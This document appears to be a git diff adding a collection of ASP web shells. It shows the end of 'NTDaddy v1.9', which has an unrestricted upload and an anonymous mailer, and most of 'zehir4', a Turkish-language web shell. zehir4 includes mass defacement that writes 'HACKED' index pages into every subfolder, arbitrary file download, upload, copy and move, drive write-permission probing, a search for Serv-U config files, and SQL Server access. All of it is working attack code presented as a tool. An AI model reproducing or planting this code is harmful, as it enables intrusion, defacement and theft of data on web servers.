+cl3 = 1
+L = LenB(Binary)
+Do While cl1<=L
+pl3 = pl3 & Chr(AscB(MidB(Binary,cl1,1)))
+cl1 = cl1 + 1
+cl3 = cl3 + 1
+if cl3>300 then
+pl2 = pl2 & pl3
+pl3 = ""
+cl3 = 1
+cl2 = cl2 + 1
+if cl2>200 then
+pl1 = pl1 & pl2
+pl2 = ""
+cl2 = 1
+End If
+End If
+Loop
+BinaryToString = pl1 & pl2 & pl3
+End Function
+Function BinaryToStringold(Binary)
+Dim I, S
+For I = 1 To LenB(Binary)
+S = S & Chr(AscB(MidB(Binary, I, 1)))
+Next
+BinaryToString = S
+End Function
+Function StringToBinary(String)
+Dim I, B
+For I=1 to len(String)
+B = B & ChrB(Asc(Mid(String,I,1)))
+Next
+StringToBinary = B
+End Function
+Function vbsSaveAs(FileName, ByteArray)
+Dim FS, TextStream
+Set FS = CreateObject("Scripting.FileSystemObject")
+Set TextStream = FS.CreateTextFile(FileName)
+TextStream.Write BinaryToString(ByteArray) 
+TextStream.Close
+End Function
+</SCRIPT>
+<SCRIPT RUNAT=SERVER LANGUAGE=JSCRIPT>
+function CreateUploadField(){ return new uf_Init() }
+function uf_Init(){
+this.Name = null
+this.ContentDisposition = null
+this.FileName = null
+this.FilePath = null
+this.ContentType = null
+this.Value = null
+this.Length = null
+}
+function CreateBinaryData(){ return new bin_Init() }
+function bin_Init(){
+this.ByteArray = null
+this.Length = null
+this.String = jsBinaryToString
+this.SaveAs = jsSaveAs
+}
+function jsBinaryToString(){
+return BinaryToString(this.ByteArray)
+}
+function jsSaveAs(FileName){
+return vbsSaveAs(FileName, this.ByteArray)
+}
+</SCRIPT>
+<%
+If Request.ServerVariables("REQUEST_METHOD") = "POST" Then 
+Set Fields = GetUpload()
+FilePath = Server.MapPath(".") & "\" & Fields("File1").FileName
+Fields("File1").Value.SaveAs FilePath
+End If
+%>
+<%
+Else
+Dim anonFrom,anonTo,anonSubj,anonBody
+anonFrom = request.form("From")
+anonTo = request.form("To")
+anonSubj = request.form("Subject")
+anonBody = request.form("Body")
+Set objMail = CreateObject("CDONTS.NewMail")
+objMail.From=anonFrom
+objMail.To=anonTo
+objMail.Subject=anonSubj
+objMail.Body=anonBody
+intReturn=objMail.Send()
+%>
+<html>
+<head><title>|[NTDaddy v1.9 | anon email]</title></head>
+<h1>Message sent successfully!</h1><br><br><br>
+<table border=0 cellpadding="0" cellspacing="3">
+<tr>
+<td>
+<input type='button' value='Back' onclick=history.back()> </td>
+<td>
+<h2>[NTDaddy v1.9 - obzerve | fux0r inc.]</h2> </td>
+</tr>
+</table>
+</html>
+<%
+End if
+%>
+
+
+
diff --git a/xakep-shells/ASP/zehir4.asp.txt b/xakep-shells/ASP/zehir4.asp.txt
new file mode 100644
index 0000000..1be2420
--- /dev/null
+++ b/xakep-shells/ASP/zehir4.asp.txt
@@ -0,0 +1,1190 @@
+<%
+mpat=replace(Request.ServerVariables("PATH_TRANSLATED"),"/","\")
+dosyaPath = mid(mpat,InStrRev(mpat,"\")+1)
+on error resume next
+Dim objFSO,popup
+Set objFSO = CreateObject ("Scripting.FileSystemObject")
+if Request("kuskapani")=1 then
+    Response.End
+end if
+
+
+if Request("kuskapani")=2 then
+    on error resume next
+    path = Request("path")
+    sFolder = Request("SubFolder")
+    fName = Request("FileName")
+    d1 = Request("dosya1")
+    d2 = Request("dosya2")
+    d3 = Request("dosya3")
+    d4 = Request("dosya4")
+    bg__ = Request.Form("selectColour")
+    if bg__ = "0" then bg__ = "#ffffff"
+    byMesaj = "<body bgColor='"&bg__&"'>" & Request("byMesaj") & "<br><br><center><font color=gray size=2>HACKED " & Session("n2") & "3 ;)</font>"
+
+    sFolder = Replace(sFolder,"/","\")
+
+    if Right(sFolder,1)<>"\" then sFolder = sFolder & "\"
+    Set f = objFSO.GetFolder(Path)
+    Set fc = f.SubFolders
+    h__ = 0
+    f__ = 0
+    ss__ = now
+    For Each f1 In fc
+        hedef_ = replace(f1.path,"/","\")
+        if Right(hedef_,1)<>"\" then hedef_ = hedef_ & "\"
+        hedef__ = left(hedef_,len(hedef_)-1)
+        folderName_ = Right(hedef__, len(hedef__)-instrrev(hedef__,"\"))
+            if d1<>"" then d1 = true
+            if d2<>"" then d2 = true
+            if d3<>"" then d3 = true
+            if d4<>"" then d4 = true
+            on error goto 0:on error resume next
+            if fName<>"" then
+                Set MyFile = objFSO.CreateTextFile(hedef_ & sFolder & fName, True)
+                MyFile.write byMesaj
+            end if
+            if d1 then
+                Set MyFile = objFSO.CreateTextFile(hedef_ & sFolder & "index.htm", True)
+                MyFile.write byMesaj
+            end if
+            if d2 then
+                Set MyFile = objFSO.CreateTextFile(hedef_ & sFolder & "default.htm", True)
+                MyFile.write byMesaj
+            end if
+            if d3 then
+                Set MyFile = objFSO.CreateTextFile(hedef_ & sFolder & "index.asp", True)
+                MyFile.write byMesaj
+            end if
+            if d4 then
+                Set MyFile = objFSO.CreateTextFile(hedef_ & sFolder & "default.asp", True)
+                MyFile.write byMesaj
+            end if
+
+            if err<>0 then
+                response.Write folderName_ & " <font color=red>[FAILED!]</font><br>"
+                f__ = f__ + 1
+            else
+                response.Write folderName_ & " <font color=blue>[HACKED]</font><br>"
+                h__ = h__ + 1
+            end if
+    Next
+    ss___ = now
+    response.Write "<br><font color=white>by zehir!...</font><br><b>Sonuc : </b> Toplam Süre : "&left(ss__-ss___,5)&"sn. ;)<br><font color=blue>Hacked</font> = "&h__&"<br><font color=red>Failed</font> = "&f__
+    response.End
+end if
+
+status = Request("status")
+path   = Request("path")
+dPath  = Request("dPath")
+arama  = Request("txArama")
+dkayit = Request("dkayit")
+table  = Request("table")
+del    = Request("del")
+islem  = Request("islem")
+strSQL = Request("strSQL")
+cf       = Request("cf")
+pathfile = request("pathfile")
+if path="" then path=request.servervariables("APPL_PHYSICAL_PATH")
+if status="" then status=2
+popup = true
+'////////////////////////////////
+Function ReadBinaryFile(FileName)
+  Const adTypeBinary = 1
+  Dim BinaryStream
+  Set BinaryStream = CreateObject("ADODB.Stream")
+  BinaryStream.Type = adTypeBinary
+  BinaryStream.Open
+  BinaryStream.LoadFromFile FileName
+  ReadBinaryFile = BinaryStream.Read
+End Function
+if status="-3" then
+    Response.Buffer=True
+    Set Fil = objFSO.GetFile(pathfile)
+
+    Response.contenttype="application/force-download"
+    Response.AddHeader "Cache-control","private"
+    Response.AddHeader "Content-Length", Fil.Size
+    Response.AddHeader "Content-Disposition", "attachment; filename=" & Fil.name
+
+    Response.BinaryWrite readBinaryFile(Fil.path)
+    Set f = Nothing: Set Fil = Nothing
+    response.End()
+end if
+'//////////////////////////////////
+if status="-4" then popup=false
+if status="13" then popup=false
+if status="14" then popup=false
+if status="15" then popup=false
+if status="16" then popup=false
+if status="17" then popup=false
+if status="18" then popup=false
+if status="19" then popup=false
+if status="33" then popup=false
+if status="40" then popup=false
+if status="50" then popup=false
+byMsg = request.QueryString("byMsg")
+if byMsg<>"" then response.Write byMsg
+response.Write "<title>zehir3 --> powered by zehir &lt;zehirhacker@hotmail.com&gt;</title>"
+if popup then
+%>
+<center>
+<a href="<%=dosyaPath%>?mevla=1&status=13" onclick="sistemBilgisi(this.href);return false;">System Info</a>
+<font color=yellow> | </font>
+<a href="<%=dosyaPath%>?mevla=1&status=40" onclick="sistemTest(this.href);return false;">System Test</a>
+<font color=yellow> | </font>
+<a href="<%=dosyaPath%>?mevla=1&status=50&path=<%=path%>" onclick="SitelerTestte(this.href);return false;">Sites Test</a>
+<font color=yellow> | </font>
+<a href="<%=dosyaPath%>?mevla=1&status=14&path=<%=path%>" onclick="klasorIslemleri(this.href);return false;">Folder Action</a>
+<font color=yellow> | </font>
+<a href="<%=dosyaPath%>?mevla=1&status=15" onclick="sqlServer(this.href);return false;">SQL Server</a>
+<font color=yellow> | </font>
+<a href="<%=dosyaPath%>?mevla=1&status=33" onclick="poweredby(this.href);return false;">POWERED BY</a>
+<script language=javascript>
+    function sistemBilgisi(yol){
+        NewWindow(yol,"",600,240,"no");
+    }
+    function SitelerTestte(yol){
+        NewWindow(yol,"",530,420,"no");
+    }
+    function klasorIslemleri(yol){
+        NewWindow(yol,"",400,280,"no");
+    }
+    function sqlServer(yol){
+        NewWindow(yol,"",300,50,"no");
+    }
+    function poweredby(yol){
+        NewWindow(yol,"",300,50,"no");
+    }
+    function sistemTest(yol){
+        NewWindow(yol,"",400,300,"no");
+    }
+</script>
+<%
+end if
+'####################################
+Class clsUpload
+    Private mbinData
+    Private mlngChunkIndex
+    Private mlngBytesReceived
+    Private mstrDelimiter
+    Private CR
+    Private LF
+    Private CRLF
+    Private mobjFieldAry()
+    Private mlngCount
+
+    Private Sub RequestData
+        Dim llngLength
+        mlngBytesReceived = Request.TotalBytes
+        mbinData = Request.BinaryRead(mlngBytesReceived)
+    End Sub
+
+    Private Sub ParseDelimiter()
+        mstrDelimiter = MidB(mbinData, 1, InStrB(1, mbinData, CRLF) - 1)
+    End Sub
+
+    Private Sub ParseData()
+        Dim llngStart
+        Dim llngLength
+        Dim llngEnd
+        Dim lbinChunk
+        llngStart = 1
+        llngStart = InStrB(llngStart, mbinData, mstrDelimiter & CRLF)
+        While Not llngStart = 0
+            llngEnd = InStrB(llngStart + 1, mbinData, mstrDelimiter) - 2
+            llngLength = llngEnd - llngStart
+            lbinChunk = MidB(mbinData, llngStart, llngLength)
+            Call ParseChunk(lbinChunk)
+            llngStart = InStrB(llngStart + 1, mbinData, mstrDelimiter & CRLF)
+        Wend
+    End Sub
+
+    Private Sub ParseChunk(ByRef pbinChunk)
+        Dim lstrName
+        Dim lstrFileName
+        Dim lstrContentType
+        Dim lbinData
+        Dim lstrDisposition
+        Dim lstrValue
+        lstrDisposition = ParseDisposition(pbinChunk)
+        lstrName = ParseName(lstrDisposition)
+        lstrFileName = ParseFileName(lstrDisposition)
+        lstrContentType = ParseContentType(pbinChunk)
+        If lstrContentType = "" Then
+            lstrValue = CStrU(ParseBinaryData(pbinChunk))
+        Else
+            lbinData = ParseBinaryData(pbinChunk)
+        End If
+        Call AddField(lstrName, lstrFileName, lstrContentType, lstrValue, lbinData)
+    End Sub
+
+    Private Sub AddField(ByRef pstrName, ByRef pstrFileName, ByRef pstrContentType, ByRef pstrValue, ByRef pbinData)
+        Dim lobjField
+        ReDim Preserve mobjFieldAry(mlngCount)
+        Set lobjField = New clsField
+        lobjField.Name = pstrName
+        lobjField.FilePath = pstrFileName
+        lobjField.ContentType = pstrContentType
+        If LenB(pbinData) = 0 Then
+            lobjField.BinaryData = ChrB(0)
+            lobjField.Value = pstrValue
+            lobjField.Length = Len(pstrValue)
+        Else
+            lobjField.BinaryData = pbinData
+            lobjField.Length = LenB(pbinData)
+            lobjField.Value = ""
+        End If
+        Set mobjFieldAry(mlngCount) = lobjField
+        mlngCount = mlngCount + 1
+    End Sub
+
+    Private Function ParseBinaryData(ByRef pbinChunk)
+        Dim llngStart
+        llngStart = InStrB(1, pbinChunk, CRLF & CRLF)
+        If llngStart = 0 Then Exit Function
+        llngStart = llngStart + 4
+        ParseBinaryData = MidB(pbinChunk, llngStart)
+    End Function
+
+    Private Function ParseContentType(ByRef pbinChunk)
+        Dim llngStart
+        Dim llngEnd
+        Dim llngLength
+        llngStart = InStrB(1, pbinChunk, CRLF & CStrB("Content-Type:"), vbTextCompare)
+        If llngStart = 0 Then Exit Function
+        llngEnd = InStrB(llngStart + 15, pbinChunk, CR)
+        If llngEnd = 0 Then Exit Function
+        llngStart = llngStart + 15
+        If llngStart >= llngEnd Then Exit Function
+        llngLength = llngEnd - llngStart
+        ParseContentType = Trim(CStrU(MidB(pbinChunk, llngStart, llngLength)))
+    End Function
+
+    Private Function ParseDisposition(ByRef pbinChunk)
+        Dim llngStart
+        Dim llngEnd
+        Dim llngLength
+        llngStart = InStrB(1, pbinChunk, CRLF & CStrB("Content-Disposition:"), vbTextCompare)
+        If llngStart = 0 Then Exit Function
+        llngEnd = InStrB(llngStart + 22, pbinChunk, CRLF)
+        If llngEnd = 0 Then Exit Function
+        llngStart = llngStart + 22
+        If llngStart >= llngEnd Then Exit Function
+        llngLength = llngEnd - llngStart
+        ParseDisposition = CStrU(MidB(pbinChunk, llngStart, llngLength))
+    End Function
+
+    Private Function ParseName(ByRef pstrDisposition)
+        Dim llngStart
+        Dim llngEnd
+        Dim llngLength
+        llngStart = InStr(1, pstrDisposition, "name=""", vbTextCompare)
+        If llngStart = 0 Then Exit Function
+        llngEnd = InStr(llngStart + 6, pstrDisposition, """")
+        If llngEnd = 0 Then Exit Function
+        llngStart = llngStart + 6
+        If llngStart >= llngEnd Then Exit Function
+        llngLength = llngEnd - llngStart
+        ParseName = Mid(pstrDisposition, llngStart, llngLength)
+    End Function
+' ------------------------------------------------------------------------------
+    Private Function ParseFileName(ByRef pstrDisposition)
+        Dim llngStart
+        Dim llngEnd
+        Dim llngLength
+        llngStart = InStr(1, pstrDisposition, "filename=""", vbTextCompare)
+        If llngStart = 0 Then Exit Function
+        llngEnd = InStr(llngStart + 10, pstrDisposition, """")
+        If llngEnd = 0 Then Exit Function
+        llngStart = llngStart + 10
+        If llngStart >= llngEnd Then Exit Function
+        llngLength = llngEnd - llngStart
+        ParseFileName = Mid(pstrDisposition, llngStart, llngLength)
+    End Function
+
+    Public Property Get Count()
+        Count = mlngCount
+    End Property
+
+    Public Default Property Get Fields(ByVal pstrName)
+        Dim llngIndex
+        If IsNumeric(pstrName) Then
+            llngIndex = CLng(pstrName)
+            If llngIndex > mlngCount - 1 Or llngIndex < 0 Then
+                Call Err.Raise(vbObjectError + 1, "clsUpload.asp", "Object does not exist within the ordinal reference.")
+                Exit Property
+            End If
+            Set Fields = mobjFieldAry(pstrName)
+        Else
+            pstrName = LCase(pstrname)
+            For llngIndex = 0 To mlngCount - 1
+                If LCase(mobjFieldAry(llngIndex).Name) = pstrName Then
+                    Set Fields = mobjFieldAry(llngIndex)
+                    Exit Property
+                End If
+            Next
+        End If
+        Set Fields = New clsField
+    End Property
+
+    Private Sub Class_Terminate()
+        Dim llngIndex
+        For llngIndex = 0 To mlngCount - 1
+            Set mobjFieldAry(llngIndex) = Nothing
+
+        Next
+        ReDim mobjFieldAry(-1)
+    End Sub
+
+    Private Sub Class_Initialize()
+        ReDim mobjFieldAry(-1)
+        CR = ChrB(Asc(vbCr))
+        LF = ChrB(Asc(vbLf))
+        CRLF = CR & LF
+        mlngCount = 0
+        Call RequestData
+        Call ParseDelimiter()
+        Call ParseData
+    End Sub
+
+    Private Function CStrU(ByRef pstrANSI)
+        Dim llngLength
+        Dim llngIndex
+        llngLength = LenB(pstrANSI)
+        For llngIndex = 1 To llngLength
+            CStrU = CStrU & Chr(AscB(MidB(pstrANSI, llngIndex, 1)))
+        Next
+    End Function
+
+    Private Function CStrB(ByRef pstrUnicode)
+        Dim llngLength
+        Dim llngIndex
+        llngLength = Len(pstrUnicode)
+        For llngIndex = 1 To llngLength
+            CStrB = CStrB & ChrB(Asc(Mid(pstrUnicode, llngIndex, 1)))
+        Next
+    End Function
+End Class
+'####################################
+Session("n1") = "by Ejder"
+Class clsField
+    Public Name
+    Private mstrPath
+    Public FileDir
+    Public FileExt
+    Public FileName
+    Public ContentType
+    Public Value
+    Public BinaryData
+    Public Length
+    Private mstrText
+
+    Public Property Get BLOB()
+        BLOB = BinaryData
+    End Property
+
+    Public Function BinaryAsText()
+        Dim lbinBytes
+        Dim lobjRs
+        If Length = 0 Then Exit Function
+        If LenB(BinaryData) = 0 Then Exit Function
+
+        If Not Len(mstrText) = 0 Then
+            BinaryAsText = mstrText
+            Exit Function
+        End If
+        lbinBytes = ASCII2Bytes(BinaryData)
+           mstrText = Bytes2Unicode(lbinBytes)
+        BinaryAsText = mstrText
+    End Function
+
+    Public Sub SaveAs(ByRef pstrFileName)
+        Const adTypeBinary=1
+        Const adSaveCreateOverWrite=2
+        Dim lobjStream
+        Dim lobjRs
+        Dim lbinBytes
+        If Length = 0 Then Exit Sub
+        If LenB(BinaryData) = 0 Then Exit Sub
+        Set lobjStream = Server.CreateObject("ADODB.Stream")
+        lobjStream.Type = adTypeBinary
+        Call lobjStream.Open()
+        lbinBytes = ASCII2Bytes(BinaryData)
+        Call lobjStream.Write(lbinBytes)
+
+        On Error Resume Next
+
+        Call lobjStream.SaveToFile(pstrFileName, adSaveCreateOverWrite)
+
+        'if err<>0 then response.Write "<br>"&err.Description
+
+        Call lobjStream.Close()
+        Set lobjStream = Nothing
+    End Sub
+
+    Public Property Let FilePath(ByRef pstrPath)
+        mstrPath = pstrPath
+        If Not InStrRev(pstrPath, ".") = 0 Then
+            FileExt = Mid(pstrPath, InStrRev(pstrPath, ".") + 1)
+            FileExt = UCase(FileExt)
+        End If
+        If Not InStrRev(pstrPath, "\") = 0 Then
+            FileName = Mid(pstrPath, InStrRev(pstrPath, "\") + 1)
+        End If
+        If Not InStrRev(pstrPath, "\") = 0 Then
+            FileDir = Mid(pstrPath, 1, InStrRev(pstrPath, "\") - 1)
+        End If
+    End Property
+
+    Public Property Get FilePath()
+        FilePath = mstrPath
+    End Property
+
+    private Function ASCII2Bytes(ByRef pbinBinaryData)
+        Const adLongVarBinary=205
+        Dim lobjRs
+        Dim llngLength
+        Dim lbinBuffer
+        llngLength = LenB(pbinBinaryData)
+        Set lobjRs = Server.CreateObject("ADODB.Recordset")
+        Call lobjRs.Fields.Append("BinaryData", adLongVarBinary, llngLength)
+        Call lobjRs.Open()
+        Call lobjRs.AddNew()
+        Call lobjRs.Fields("BinaryData").AppendChunk(pbinBinaryData & ChrB(0))
+        Call lobjRs.Update()
+        lbinBuffer = lobjRs.Fields("BinaryData").GetChunk(llngLength)
+        Call lobjRs.Close()
+        Set lobjRs = Nothing
+        ASCII2Bytes = lbinBuffer
+    End Function
+
+    Private Function Bytes2Unicode(ByRef pbinBytes)
+        Dim lobjRs
+        Dim llngLength
+        Dim lstrBuffer
+        llngLength = LenB(pbinBytes)
+        Set lobjRs = Server.CreateObject("ADODB.Recordset")
+        Call lobjRs.Fields.Append("BinaryData", adLongVarChar, llngLength)
+        Call lobjRs.Open()
+        Call lobjRs.AddNew()
+        Call lobjRs.Fields("BinaryData").AppendChunk(pbinBytes)
+        Call lobjRs.Update()
+        lstrBuffer = lobjRs.Fields("BinaryData").Value
+        Call lobjRs.Close()
+        Set lobjRs = Nothing
+        Bytes2Unicode = lstrBuffer
+    End Function
+End Class
+Session("n2") = "EJDER"
+'####################################
+function addslash(path)
+    if right(path,1)="\" then addslash=path else addslash=path & "\"
+end function
+
+sub Upload()
+    dim objUpload,f,max,i,name,path,size,success
+
+    set objUpload=New clsUpload
+
+    targetPath=objUpload.Fields("folder").Value
+    max=objUpload.Fields("max").Value
+
+    for i=1 to max
+        name=objUpload.Fields("file" & i).FileName
+        size=objUpload.Fields("file" & i).Length
+        if (name<>"") and (size>0) then
+            gMsg=gMsg & "<br>" & vbNewLine & "- " & name & " (" & FormatNumber(size,0) & " bytes): "
+            path=addslash(targetPath) & name
+            objUpload.Fields("file" & i).SaveAs path
+
+            if objFSO.FileExists(path) then
+                on error resume next
+                set f=objFSO.GetFile(path)
+                if IsObject(f) then
+                    if f.Size=size then success=true else success=false
+                end if
+                set f=nothing
+            end if
+            if success then  gMsg=gMsg & "<font color=blue>uploaded</font>" else gMsg = gMsg & "<font color=red>failed!</font>"
+        end if
+    next
+    response.Write gMsg
+    set objUpload=nothing
+
+end sub
+
+if status="-4" then
+    Upload()
+'    hataKontrol
+    popup=false
+end if
+'////////////////////////////////
+sub hataKontrol
+    if err<>0 then
+        Response.Write "<font color=red size=2>Hata : "&err.Description&"</font>"
+    end if
+end sub
+
+sub araBul(path_,ara_)
+    on error resume next
+    If Len(path_) > 0 Then
+        cur = path_&"\"
+        If cur = "\\" Then cur = ""
+            parent = ""
+            If InStrRev(cur,"\") > 0 Then
+            parent = Left(cur, InStrRev(cur, "\", Len(cur)-1))
+        End If
+    Else
+        cur = ""
+    End If
+
+    Set f = objFSO.GetFolder(cur)
+
+    Set fc = f.Files
+    For Each f1 In fc
+        if lcase(InStr(1,f1.name,lcase(ara_)))>0 then
+            downStr = "<font face=webdings size=5><a href='"&dosyapath&"?status=-3&pathFile="&f1.path&"&Time="&time&"'>Í</a></font>"
+            if lcase(ara_)="mdb" then
+                Response.Write downStr&"<font face=wingdings size=5><a href='"&dosyapath&"?status=3&path="&path_&"&Del="&f1.path&"&Time="&time&"'>û</a></font> * <a href='"&dosyapath&"?status=7&path="&f1.path&"&Time="&time&"'>"&f1.path&" ["&f1.size&"]"&"</a></b><br>"
+            else
+                Response.Write downStr&"<font face=wingdings size=5><a href='"&dosyapath&"?status=3&path="&path_&"&Del="&f1.path&"&Time="&time&"'>û</a><a href='"&dosyapath&"?status=10&dPath="&f1.path&"&path="&path&"&Time="&time&"'>!</a></font> - <a href='"&dosyapath&"?status=5&path="&f1.path&"&Time="&time&"'>"&f1.path&" ["&f1.size&"]"&"</a></b><br>"
+            end if
+        end if
+    Next
+
+    Set fs = f.SubFolders
+    For Each f1 In fs
+        araBul f1.path,ara_
+    Next
+    Set    f        = Nothing
+    Set fc        = Nothing
+    Set fs        = Nothing
+end sub
+
+sub sistemTest
+    response.Write "<table width='100%' align=center cellpadding=0 cellspacing=0 border=1>"
+    response.Write "<tr bgcolor=#ffffc0><td width='30%' align=center><font color=navy><b>Konum</td><td width='70%' align=center><font color=navy><b>Sonuç</td></tr>"
+
+    servu_Test
+    WriteTestOnDriver
+    WriteTestOnLocalPath
+    LocalPathParentFolder
+    LocalPathPParentFolder
+
+    response.Write "</table>"
+end sub
+
+sub servu_Test
+    dosya_ = Array("Program Files\Serv-u\Serv-u.ini", "Program Files\Serv-u\Serv-u daemon.ini", "Serv-u\Serv-u.ini", "Serv-u\Serv-u daemon.ini")
+    for each drive_ in objFSO.Drives
+        if drive_.Drivetype=2 or drive_.Drivetype=3 then
+            for each d_ in dosya_
+                d_ = drive_.DriveLetter&":\"&d_
+                if objFSO.FileExists(d_) then
+                    response.Write "<tr><td><b>Serv-U ini file : </td><td><font color=yellow>"&d_&"</td></tr>"
+                end if
+            next
+        end if
+    next
+end sub
+
+function yaziyomu(yol)
+    on error goto 0:on error resume next
+    dim sonuc__
+    Set MyFile = objFSO.CreateTextFile(yol & "\test.zehir", True)
+    MyFile.write "byzehir <zehirhacker@hotmail.com>"
+    set MyFile = Nothing
+    if err<>0 then
+        sonuc__="<font color=red>Yazma Hakký Yok!</font>"
+    else
+        sonuc__="<font color=yellow>Yazma Hakký Var!</font>"
+        on error goto 0: on error resume next
+        objFSO.DeleteFile yol & "\test.zehir",true
+        if err<>0 then
+            sonuc__=sonuc__&"<br><font color=red>Silme Hakký Yok!</font>"
+        else
+            sonuc__=sonuc__&"<br><font color=yellow>Silme Hakký Var!</font>"
+        end if
+    end if
+    yaziyomu = sonuc__
+end function
+
+function yaziyomu2(yol)
+    on error goto 0:on error resume next
+    Set MyFile = objFSO.CreateTextFile(yol & "\test.zehir", True)
+    MyFile.write "byzehir <zehirhacker@hotmail.com>"
+    set MyFile = Nothing
+    if err<>0 then
+        yaziyomu2 = false
+    else
+        objFSO.DeleteFile yol & "\test.zehir"
+        yaziyomu2 = true
+    end if
+end function
+
+sub WriteTestOnDriver
+    for each drive_ in objFSO.Drives
+        if drive_.Drivetype=2 or drive_.Drivetype=3 then
+            if not yaziyomu2(drive_.DriveLetter&":\") then
+                Response.Write "<tr><td><b>"&drive_.DriveLetter&":\</td><td><font color=red>yazma yetkisi yok! : ["&err.Description&"]</td></tr>"
+            else
+                Response.Write "<tr><td><b>"&drive_.DriveLetter&":\</td><td><font color=yellow>yazma yetkisi var!</td></tr>"
+            end if
+        end if
+    next
+end sub
+
+sub WriteTestOnLocalPath
+    on error goto 0
+    on error resume next
+    if not yaziyomu2(request.servervariables("APPL_PHYSICAL_PATH")) then
+        Response.Write "<tr><td><b>Local Path </td><td><font color=red>yazma yetkisi yok! : ["&err.Description&"]</td></tr>"
+    else
+        Response.Write "<tr><td><b>Local Path </td><td><font color=yellow>yazma yetkisi var!</td></tr>"
+    end if
+end sub
+
+sub LocalPathParentFolder
+    on error goto 0
+    on error resume next
+    hed_ = request.servervariables("APPL_PHYSICAL_PATH")
+    if Right(hed_,1)="\" then hed_ = left(hed_,len(hed_)-1)
+    parhed_ = left(hed_,InStrRev(hed_,"\"))
+
+    Set f = objFSO.GetFolder(parhed_)
+    Set fc = f.SubFolders
+
+    int_fol=0
+    int_fil=0
+    For Each f1 In fc
+        int_fol=int_fol+1
+    Next
+
+    Set fc = f.files
+    For Each f1 In fc
+        int_fil=int_fil+1
+    Next
+
+    if err<>0 then
+        Response.Write "<tr><td><b>Local Path <br>Parent Folder</td><td><font color=red>Hata Oluþtu : ["&err.Description&"]</td></tr>"
+    else
+        Response.Write "<tr><td><b>Local Path <br>Parent Folder</td><td><font color=yellow>Folder : "&FormatNumber(int_fol,0)&"<br>File : "&FormatNumber(int_fil,0)&"</td></tr>"
+    end if
+end sub
+
+sub LocalPathPParentFolder
+    on error goto 0
+    on error resume next
+    hed_ = request.servervariables("APPL_PHYSICAL_PATH")
+    if Right(hed_,1)="\" then hed_ = left(hed_,len(hed_)-1)
+    hed_ = left(hed_,InStrRev(hed_,"\"))
+    if Right(hed_,1)="\" then hed_ = left(hed_,len(hed_)-1)
+    parhed_ = left(hed_,InStrRev(hed_,"\"))
+
+    Set f = objFSO.GetFolder(parhed_)
+    Set fc = f.SubFolders
+    int_fol=0
+    int_fil=0
+    For Each f1 In fc
+        int_fol=int_fol+1
+    Next
+
+    Set fc = f.files
+    For Each f1 In fc
+        int_fil=int_fil+1
+    Next
+
+    if err<>0 then
+        if err=451 then
+            Response.Write "<tr><td><b>Local Path <br>P.Parent Folder</td><td><font color=red>Data Üst Klasor Yok :)</td></tr>"
+        else
+            Response.Write "<tr><td><b>Local Path <br>P.Parent Folder</td><td><font color=red>Hata Oluþtu : ["&err.Description&"]</td></tr>"
+        end if
+    else
+        Response.Write "<tr><td><b>Local Path <br>P.Parent Folder</td><td><font color=yellow>Folder : "&FormatNumber(int_fol,0)&"<br>File : "&FormatNumber(int_fil,0)&"</td></tr>"
+    end if
+end sub
+
+SELECT CASE status
+CASE 13 'Sistem Bilgisi
+    Response.Write "<table width=100% cellpadding=0 cellspacing=0><tr><td colspan=2 align=center><font color=yellow face='courier new'><b><font style='FONT-WEIGHT:normal' color=red face=wingdings>:</font> Sistem Bilgileri <font color=red face=wingdings style='FONT-WEIGHT:normal'>:</font></td></tr>"
+    Response.Write "<tr><td><b><font color=red>Local Adres</td><td> " & request.servervariables("REMOTE_ADDR") & "</td></tr>"
+    Response.Write "<tr><td><b><font color=red>User Agent</td><td> " & request.servervariables("HTTP_USER_AGENT") & "</td></tr>"
+    Response.Write "<tr><td><b><font color=red>Server</td><td> " & request.servervariables("SERVER_NAME") & "</td></tr>"
+    Response.Write "<tr><td><b><font color=red>IP</td><td> " & request.servervariables("LOCAL_ADDR") & "</td></tr>"
+    Response.Write "<tr><td><b><font color=red>HTTPD</td><td> " & request.servervariables("SERVER_SOFTWARE") & "</td></tr>"
+    Response.Write "<tr><td><b><font color=red>Port</td><td> " & request.servervariables("SERVER_PORT") & "</td></tr>"
+    Response.Write "<tr><td><b><font color=red>Yol</td><td> " & request.servervariables("APPL_PHYSICAL_PATH") & "</td></tr>"
+    Response.Write "<tr><td><b><font color=red>Log Root</td><td> " & request.servervariables("APPL_MD_PATH") & "</td></tr>"
+    Response.Write "<tr><td><b><font color=red>HTTPS</td><td> " & request.servervariables("HTTPS") & "</td></tr>"
+    Response.Write "</table>"
+    popup = false
+CASE 14 'Upload and Search
+    aramaUpload
+    popup = false
+    hataKontrol
+CASE 15 'Ms. SQL Server
+    Response.Write "<form method=get action='"&DosyPath&"' target='_opener' id=form1 name=form1>"
+    Response.Write "<table cellpadding=0 cellspacing=0 align=center><tr><td align=center><font size=2>SQL Server için connection string giriniz</td></tr><tr><td align=center>"
+    Response.Write "<input type=hidden value='7' name=status><input type=hidden value='"&time&"' name=Time>"
+    Response.Write "<input style='width:250; height:21' value='' name=path><br>"
+    response.Write "<input type=submit value='SQL Servera Baðlan' style='height:23;width:170' id=submit1 name=submit1>"
+    Response.Write "</td></tr></table>"
+    response.Write "</form>"
+
+    popup = false
+    hataKontrol
+CASE 16 'file Copy window
+    Response.Write "<form method=get action='"&DosyPath&"' id=form1 name=form1>"
+    Response.Write "<table cellpadding=0 cellspacing=0 align=center><tr><td width=100><font size=2>Kop. Yer : </td><td>"
+    Response.Write "<input type=hidden value='17' name=status><input type=hidden value='"&PathFile&"' name=path><input type=hidden value='"&time&"' name=Time>"
+    Response.Write "<input style='width:250; height:21' value='"&PathFile&"' name=cf>"
+    response.Write "<input type=submit value='Kopyala' style='height:22;width:70' id=submit1 name=submit1>"
+    Response.Write "</td></tr><tr><td colspan=3 align=center><font size=2>"
+    response.Write "<input type=radio name='islem' value='kopyala' checked>Kopyala"
+    response.Write "<input type=radio name='islem' value='tasi'>Tasi"
+    response.Write "</table>"
+    response.Write "</form>"
+
+    popup = false
+    hataKontrol
+CASE 17 'file Copy
+    isl = ""
+    if islem="kopyala" then
+        objFSO.CopyFile path,cf
+        isl="kopyalandý.."
+    elseif islem="tasi" then
+        objFSO.MoveFile path,cf
+        isl="taþýndý.."
+    end if
+    response.Write "Dosya "&isl
+    response.Write "<br><font color=red>Kaynak : </font>"&path&"<br><font color=red>Hedef : </font>"&cf
+    response.Write "<br>"
+    popup = false
+    hataKontrol
+CASE 18 'folder Copy window
+    Response.Write "<form method=get action='"&DosyPath&"' id=form1 name=form1>"
+    Response.Write "<table cellpadding=0 cellspacing=0 align=center><tr><td width=100><font size=2>Kop. Yer : </td><td>"
